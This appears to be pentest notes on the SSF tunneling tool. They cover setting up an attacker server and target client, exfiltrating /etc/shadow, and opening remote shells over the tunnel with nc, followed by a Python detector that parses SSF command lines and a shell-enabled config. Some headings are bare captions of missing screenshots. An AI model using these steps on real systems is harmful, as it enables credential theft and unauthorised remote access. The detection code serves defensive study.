SSF

Secure Socket Funneling - Network tool and toolkit - TCP and UDP port forwarding, SOCKS proxy, remote shell, standalone and cross platform.

Source 1: https://github.com/securesocketfunneling/ssf

Source 2: https://securesocketfunneling.github.io/ssf/#home

How to extract files

Opening a server on the Attacker machine.

  • -l sets the IP address the attacker's server listens on; without this flag it listens on 0.0.0.0

  • The default port (-p) is 8011

Opening the server on attacker
  • -D: the attacker (server) will act as the SOCKS server

  • -F: the target (client) will act as the SOCKS server

Opening the client on the target
  • ./ssfcp can copy files through the tunnel

Copying the /etc/shadow file to the attacker
Wireshark Results

Opening a shell with SSF

Opening a Server on attacker
  • -X: client opens a listening socket on the given port (10000)

  • -Y: client orders the server to open a listening socket on the given port (11000)

Testing the option SHELL

We can use just one of the options if we want:

  • -X lets us open a shell of the attacker on the target machine

  • -Y lets us open a shell of the target on our attacker machine

Use these options on Linux and Windows, respectively, to disable local echo:

stty -echo -icanon -isig min 1; nc 127.0.0.1 10000; stty echo icanon isig;
stty -isig; nc 127.0.0.1 10000; stty isig;
because of the option -X
because of the option -Y
All the traffic goes through the tunnel
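
For defenders, the flags described above are what appears in process-creation logs. The following is an added example (not from the original page or the SSF project) that parses constructed command lines and reports the SSF role, tunnel port and requested services; the binary names `ssf` and `ssfd`, the role labels and the optional `bind_address:` prefix on port values are assumptions not stated on this page.

```python
import shlex
from pathlib import PureWindowsPath

# ssfcp is named on the page; ssf (client) and ssfd (server) are assumed binary names.
ROLES = {"ssfd": "server", "ssf": "client", "ssfcp": "copy client"}
DEFAULT_PORT = 8011  # default for -p, per the page
SERVICES = {"-D": "socks_on_server", "-F": "socks_on_client",  # meanings per the page
            "-X": "shell_listener_on_client", "-Y": "shell_listener_on_server"}

def _port(value):
    """Parse '[[bind_address]:]port'; None when the value is not a port."""
    tail = (value or "").rsplit(":", 1)[-1]
    return int(tail) if tail.isdecimal() else None

def analyze(cmdline):
    """Return a finding for an SSF command line, or None for anything else."""
    try:
        tokens = shlex.split(cmdline, posix=False)  # keep Windows backslashes
    except ValueError:                              # unbalanced quote in the log
        tokens = cmdline.split()
    tokens = [t.strip("\"'") for t in tokens]
    # PureWindowsPath splits on both / and \, and .stem drops ".exe"
    binary = PureWindowsPath(tokens[0]).stem.lower() if tokens else ""
    if binary not in ROLES:
        return None
    finding = {"binary": binary, "role": ROLES[binary], "port": DEFAULT_PORT,
               "listen": "0.0.0.0" if binary == "ssfd" else None, "services": {}}
    args = tokens[1:]
    for flag, value in zip(args, args[1:] + [None]):
        if flag == "-p" and _port(value):
            finding["port"] = _port(value)
        elif flag == "-l" and value and binary == "ssfd":
            finding["listen"] = value
        elif flag in SERVICES and _port(value):
            finding["services"][SERVICES[flag]] = _port(value)
    return finding

# Constructed process-creation command lines (192.0.2.10 is a documentation address).
SAMPLE = [
    "./ssfd -l 192.0.2.10",
    "./ssf -F 1080 -p 8011 192.0.2.10",
    "./ssf -X 10000 -Y 11000 192.0.2.10",
    r'"C:\Tools\ssf.exe" -Y 127.0.0.1:11000 192.0.2.10',
    "./ssfcp report.txt 192.0.2.10@/tmp/report.txt",
    "/usr/bin/ssh -D 1080 user@example.org",
]

if __name__ == "__main__":
    for line in SAMPLE:
        print(line, "->", analyze(line))
```

Matching on binary name alone misses renamed executables, so pair this with network detection of the tunnel port.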

To use copy and shell options, you need to specify the config.json accordingly:

{
  "ssf": {
    "arguments": "",
    "circuit": [],
    "http_proxy": {
      "host": "",
      "port": "",
      "user_agent": "",
      "credentials": {
        "username": "",
        "password": "",
        "domain": "",
        "reuse_ntlm": true,
        "reuse_nego": true
      }
    },
    "socks_proxy": {
      "version": 5,
      "host": "",
      "port": "1080"
    },
    "tls" : {
      "ca_cert_path": "./certs/trusted/ca.crt",
      "cert_path": "./certs/certificate.crt",
      "key_path": "./certs/private.key",
      "key_password": "",
      "dh_path": "./certs/dh4096.pem",
      "cipher_alg": "DHE-RSA-AES256-GCM-SHA384"
    },
    "services": {
      "datagram_forwarder": { "enable": true },
      "datagram_listener": {
        "enable": true,
        "gateway_ports": false
      },
      "stream_forwarder": { "enable": true },
      "stream_listener": {
        "enable": true,
        "gateway_ports": false
      },
      "copy": { "enable": true },
      "shell": {
        "enable": true,
        "path": "/bin/bash",
        "args": ""
      },
      "socks": { "enable": true }
    }
  }
}
